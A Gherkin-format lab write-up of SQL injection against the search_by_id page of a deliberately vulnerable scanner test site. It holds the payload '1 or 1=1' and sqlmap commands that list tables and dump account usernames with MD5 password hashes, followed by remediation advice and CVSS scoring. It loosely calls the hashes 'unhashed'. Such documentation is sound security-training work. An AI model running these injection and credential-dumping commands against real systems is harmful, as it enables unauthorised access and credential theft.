## Version 1.4.1
## language: en

Feature: SQL Injection
  TOE:
    web-scanner-test-site
  Category:
    Input Validation
  Location:
    http://www.webscantest.com/
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Perform a SQL injection attack
  Recommendation:
    Sanitize inputs that may contain special characters from the SQL syntax

  Background:
  Hacker's software:
    | <Software name>      | <Version> |
    | Kali Linux           | 5.4.0     |
    | Firefox              | 68.6.0esr |
    | Sqlmap               | 1.4.3     |
  TOE information:
    Given that I access the site at
    """
    http://www.webscantest.com/
    """
    Then I see an index of different hacking challenges

  Scenario: Normal use case
    Given that I choose the first DB challenge under the URL
    """
    http://www.webscantest.com/datastore/search_by_id.php
    """
    Then I see a text box asking for input
    When I use an integer as input
    Then the page shows me information about a product with that ID

  Scenario: Static detection
    Given there is not access to the source code
    Then a static detection cannot be performed

  Scenario: Dynamic detection
    Given the input box I found in the page
    And that it uses an integer as ID to search for products
    When I use a character as input
    Then I get the following message
    """
    Error 1054: Unknown column 'a' in 'where clause' of SELECT * FROM inventory WHERE id = a
    """
    And I realize the the input is vulnerable to SQL injection attacks

  Scenario: Exploitation
    Given that the id field is vulnerable to SQL Injection attacks
    When I use the payload
    """
    1 or 1=1
    """
    Then I get several products listed with their respective information
    And I decide to use "sqlmap" to get more interesting information
    When I launch an attack using "sqlmap"
    """
    sqlmap -u http://www.webscantest.com/datastore/search_by_id.php --data id=1 -p id --current-db
    """
    Then I find information about the database name
    """
    current database: 'webscantest'
    """
    And I am able to find tables by using
    """
    sqlmap -u http://www.webscantest.com/datastore/search_by_id.php --data id=1 -p id -D webscantest --tables
    +-----------+
    | accounts  |
    | inventory |
    | orders    |
    | products  |
    +-----------+
    """
    When I notice the interesting table "accounts"
    Then I decide to see what columns exist in it
    """
    sqlmap -u http://www.webscantest.com/datastore/search_by_id.php --data id=1 -p id -D webscantest -T accounts --columns
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | id     | int(50)      |
    | fname  | varchar(50)  |
    | lname  | varchar(100) |
    | passwd | varchar(100) |
    | uname  | varchar(50)  |
    +--------+--------------+
    """
    When I execute the command
    """
    sqlmap -u http://www.webscantest.com/datastore/search_by_id.php --data id=1 -p id -D webscantest -T accounts -C uname,passwd --dump
    """
    Then I retrieve the site's usernames and their unhashed passwords
    """
    +----------+---------------------------------------------+
    | uname    | passwd                                      |
    +----------+---------------------------------------------+
    | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
    | testuser | 179ad45c6ce2cb97cf1029e212046e81 (testpass) |
    +----------+---------------------------------------------+
    """

  Scenario: Remediation
  Sanitize inputs that may contain special characters in the SQL syntax
    Given that the inputs are validated before constructing the SQL statement
    When I use the previously successful query
    """
    1 or 1=1
    """
    Then I get an empty response since it does not match any ID

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (High) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-15
